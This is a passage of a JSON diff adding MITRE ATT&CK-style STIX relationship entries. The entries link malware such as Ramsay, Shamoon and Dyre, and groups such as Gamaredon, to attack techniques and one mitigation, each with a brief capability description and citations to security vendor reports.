+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has used an encrypted Virtual File System to store plugins.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f43dedfa-261d-41af-bb74-e1f2eff5cbae",
+ "type": "relationship",
+ "modified": "2020-06-11T20:08:11.422Z",
+ "created": "2020-06-11T20:08:11.422Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--cc2399fd-3cd3-4319-8d0a-fbd6420cdaf8",
+ "target_ref": "attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c",
+ "relationship_type": "mitigates",
+ "description": "Routinely check user permissions to ensure only the expected users have the capability to create new instances.",
+ "id": "relationship--ac440832-cb04-409e-87fa-558097a898b6",
+ "type": "relationship",
+ "modified": "2020-06-18T11:45:36.774Z",
+ "created": "2020-06-12T12:24:14.131Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can use ImprovedReflectiveDLLInjection to deploy components.(Citation: Eset Ramsay May 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--d10e82b8-7f30-4845-af05-44ac3287bf70",
+ "type": "relationship",
+ "modified": "2020-06-15T20:53:11.794Z",
+ "created": "2020-06-12T16:15:04.825Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can use UACMe for privilege escalation.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--a024097d-78f0-4439-a239-571d361335f5",
+ "type": "relationship",
+ "modified": "2020-06-15T20:53:11.795Z",
+ "created": "2020-06-12T16:15:04.839Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can extract its agent from the body of a malicious document.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--ed6d663f-510b-4702-9c2a-ef40cc4d88c7",
+ "type": "relationship",
+ "modified": "2020-06-15T20:53:11.792Z",
+ "created": "2020-06-12T16:15:04.841Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can store collected documents in a custom container after encrypting and compressing them using RC4 and WinRAR.(Citation: Eset Ramsay May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--71abba24-84a2-449d-811a-ba006382d723",
+ "type": "relationship",
+ "modified": "2020-06-16T23:17:21.069Z",
+ "created": "2020-06-12T16:15:04.912Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) has masqueraded as a JPG image file.(Citation: Eset Ramsay May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--a38af2cc-ccc7-41aa-936c-fe15a13ddafa",
+ "type": "relationship",
+ "modified": "2020-06-12T16:15:04.914Z",
+ "created": "2020-06-12T16:15:04.914Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can collect data from removable media and stage it for exfiltration.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--f86c19e6-39a1-423c-8db2-a8258ac51bd6",
+ "type": "relationship",
+ "modified": "2020-06-12T16:15:04.917Z",
+ "created": "2020-06-12T16:15:04.917Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--ae676644-d2d2-41b7-af7e-9bed1b55898c",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can collect data from network drives and stage it for exfiltration.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--6c692a16-22b8-42bb-9a6b-3c25a2714cf5",
+ "type": "relationship",
+ "modified": "2020-06-12T16:15:04.920Z",
+ "created": "2020-06-12T16:15:04.920Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
+ "target_ref": "attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d",
+ "external_references": [
+ {
+ "source_name": "McAfee Shamoon December 2018",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-returns-to-wipe-systems-in-middle-east-europe/",
+ "description": "Mundo, A., Roccia, T., Saavedra-Morales, J., Beek, C.. (2018, December 14). Shamoon Returns to Wipe Systems in Middle East, Europe . Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[Shamoon](https://attack.mitre.org/software/S0140) can impersonate tokens using LogonUser, ImpersonateLoggedOnUser, and ImpersonateNamedPipeClient.(Citation: McAfee Shamoon December 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--755bc45a-9048-4f58-b405-2ea8329328a1",
+ "type": "relationship",
+ "modified": "2020-06-15T14:13:40.686Z",
+ "created": "2020-06-15T14:13:40.686Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
+ "target_ref": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc",
+ "external_references": [
+ {
+ "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.",
+ "url": "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/",
+ "source_name": "Unit 42 Shamoon3 2018"
+ },
+ {
+ "source_name": "McAfee Shamoon December 2018",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-returns-to-wipe-systems-in-middle-east-europe/",
+ "description": "Mundo, A., Roccia, T., Saavedra-Morales, J., Beek, C.. (2018, December 14). Shamoon Returns to Wipe Systems in Middle East, Europe . Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[Shamoon](https://attack.mitre.org/software/S0140) will reboot the infected system once the wiping functionality has been completed.(Citation: Unit 42 Shamoon3 2018)(Citation: McAfee Shamoon December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--d2ff2c76-04ed-41c4-bd35-75f7cf823aee",
+ "type": "relationship",
+ "modified": "2020-06-15T14:22:33.868Z",
+ "created": "2020-06-15T14:22:33.868Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.",
+ "url": "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/",
+ "source_name": "Unit 42 Shamoon3 2018"
+ }
+ ],
+ "description": "[Shamoon](https://attack.mitre.org/software/S0140) decrypts ciphertext using an XOR cipher and a base64-encoded string.(Citation: Unit 42 Shamoon3 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--8fe32611-4206-4bef-9698-dbcefde08090",
+ "type": "relationship",
+ "modified": "2020-06-15T14:22:33.876Z",
+ "created": "2020-06-15T14:22:33.876Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
+ "target_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611",
+ "external_references": [
+ {
+ "source_name": "McAfee Shamoon December 2018",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-returns-to-wipe-systems-in-middle-east-europe/",
+ "description": "Mundo, A., Roccia, T., Saavedra-Morales, J., Beek, C.. (2018, December 14). Shamoon Returns to Wipe Systems in Middle East, Europe . Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[Shamoon](https://attack.mitre.org/software/S0140) can change the modified time for files to evade forensic detection.(Citation: McAfee Shamoon December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--ebf68107-a2b8-4ff1-916f-e1861a20914a",
+ "type": "relationship",
+ "modified": "2020-06-15T14:22:33.878Z",
+ "created": "2020-06-15T14:22:33.878Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
+ "external_references": [
+ {
+ "source_name": "Forbes Dyre May 2017",
+ "url": "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates/#601c77842a0a",
+ "description": "Brewster, T. (2017, May 4). https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates/#601c77842a0a. Retrieved June 15, 2020."
+ },
+ {
+ "source_name": "CrowdStrike Wizard Spider March 2019",
+ "url": "https://www.crowdstrike.com/blog/wizard-spider-lunar-spider-shared-proxy-module/",
+ "description": "Feeley, B. and Stone-Gross, B. (2019, March 20). New Evidence Proves Ongoing WIZARD SPIDER / LUNAR SPIDER Collaboration. Retrieved June 15, 2020."
+ },
+ {
+ "source_name": "Malwarebytes TrickBot Sep 2019",
+ "url": "https://blog.malwarebytes.com/trojans/2019/09/trickbot-adds-new-trick-to-its-arsenal-tampering-with-trusted-texts/",
+ "description": "Umawing, J. (2019, September 3). TrickBot adds new trick to its arsenal: tampering with trusted texts. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "(Citation: Forbes Dyre May 2017)(Citation: CrowdStrike Wizard Spider March 2019)(Citation: Malwarebytes TrickBot Sep 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--61805115-3044-4ed7-91f4-074b2a073e02",
+ "type": "relationship",
+ "modified": "2020-06-16T19:04:09.745Z",
+ "created": "2020-06-15T19:06:44.790Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Dyreza November 2015",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify the users on a compromised host.(Citation: Malwarebytes Dyreza November 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--143dbc8a-0b00-4510-aacf-96437d87ea2b",
+ "type": "relationship",
+ "modified": "2020-06-15T20:49:55.503Z",
+ "created": "2020-06-15T20:49:55.503Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Dyreza November 2015",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify network settings on a compromised host.(Citation: Malwarebytes Dyreza November 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--03732f50-c46c-49f1-bd47-cc56bb96cf23",
+ "type": "relationship",
+ "modified": "2020-06-15T20:49:55.553Z",
+ "created": "2020-06-15T20:49:55.553Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Dyreza November 2015",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Dyre](https://attack.mitre.org/software/S0024) has the ability to send information staged on a compromised host externally to C2.(Citation: Malwarebytes Dyreza November 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--ed543016-8c64-42dd-89e1-7c6a49791d80",
+ "type": "relationship",
+ "modified": "2020-06-15T20:49:55.561Z",
+ "created": "2020-06-15T20:49:55.561Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
+ "target_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Dyreza November 2015",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify installed programs on a compromised host.(Citation: Malwarebytes Dyreza November 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--e4489924-d87d-4a18-8702-418361f6a2bb",
+ "type": "relationship",
+ "modified": "2020-06-15T20:49:55.564Z",
+ "created": "2020-06-15T20:49:55.564Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
+ "target_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Dyreza November 2015",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Dyre](https://attack.mitre.org/software/S0024) has been delivered with encrypted resources and must be unpacked for execution.(Citation: Malwarebytes Dyreza November 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--c6467df1-e2fd-4fff-b647-606be50a9078",
+ "type": "relationship",
+ "modified": "2020-06-15T20:49:55.569Z",
+ "created": "2020-06-15T20:49:55.569Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
+ "target_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Dyreza November 2015",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Dyre](https://attack.mitre.org/software/S0024) has the ability to create files in a TEMP folder to act as a database to store information.(Citation: Malwarebytes Dyreza November 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--2d82c7df-baa0-4268-855d-03df92fa35ab",
+ "type": "relationship",
+ "modified": "2020-06-15T20:49:55.571Z",
+ "created": "2020-06-15T20:49:55.571Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
+ "target_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Dyreza November 2015",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify running services on a compromised host.(Citation: Malwarebytes Dyreza November 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--f79947b2-49bc-4658-b93c-3aa9dbf9cd5e",
+ "type": "relationship",
+ "modified": "2020-06-15T20:49:55.573Z",
+ "created": "2020-06-15T20:49:55.573Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Dyreza November 2015",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Dyre](https://attack.mitre.org/software/S0024) has the ability to achieve persistence by adding a new task in the task scheduler to run every minute.(Citation: Malwarebytes Dyreza November 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--57828888-a833-44c7-af2c-e250d799a9bc",
+ "type": "relationship",
+ "modified": "2020-06-15T20:49:55.576Z",
+ "created": "2020-06-15T20:49:55.576Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Dyreza November 2015",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify the computer name, OS version, and hardware configuration on a compromised host.(Citation: Malwarebytes Dyreza November 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--c1a4334d-8975-4ca2-8734-d6c26e36702a",
+ "type": "relationship",
+ "modified": "2020-06-15T20:49:55.578Z",
+ "created": "2020-06-15T20:49:55.578Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
+ "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Dyreza November 2015",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Dyre](https://attack.mitre.org/software/S0024) has the ability to directly inject its code into the web browser process.(Citation: Malwarebytes Dyreza November 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--d9c19c4a-a2e3-41f9-b508-d0d008c08993",
+ "type": "relationship",
+ "modified": "2020-06-15T20:49:55.581Z",
+ "created": "2020-06-15T20:49:55.581Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
+ "target_ref": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Redaman October 2019",
+ "url": "https://research.checkpoint.com/2019/ponys-cc-servers-hidden-inside-the-bitcoin-blockchain/",
+ "description": "Eisenkraft, K., Olshtein, A. (2019, October 17). Pony\u2019s C&C servers hidden inside the Bitcoin blockchain. Retrieved June 15, 2020."
+ },
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/software/S0148) has resolved [Pony](https://attack.mitre.org/software/S0453) C2 server IP addresses by either converting Bitcoin blockchain transaction data to specific octets, or accessing IP addresses directly within the Namecoin blockchain.(Citation: CheckPoint Redaman October 2019)(Citation: Unit42 Redaman January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--25eb9cd3-80e1-4116-bfd3-fa3819dc2079",
+ "type": "relationship",
+ "modified": "2020-06-16T20:51:14.350Z",
+ "created": "2020-06-16T15:37:50.908Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4",
+ "target_ref": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90",
+ "relationship_type": "subtechnique-of",
+ "id": "relationship--761c328c-c7fe-4968-875d-537b99c4a605",
+ "type": "relationship",
+ "modified": "2020-06-16T17:23:06.601Z",
+ "created": "2020-06-16T17:23:06.601Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
+ "external_references": [
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047)'s malware can take screenshots of the compromised computer every minute.(Citation: ESET Gamaredon June 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--3a9117f6-9244-4d09-a69b-43afbb4d2998",
+ "type": "relationship",
+ "modified": "2020-06-16T17:53:18.390Z",
+ "created": "2020-06-16T17:53:18.390Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "external_references": [
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
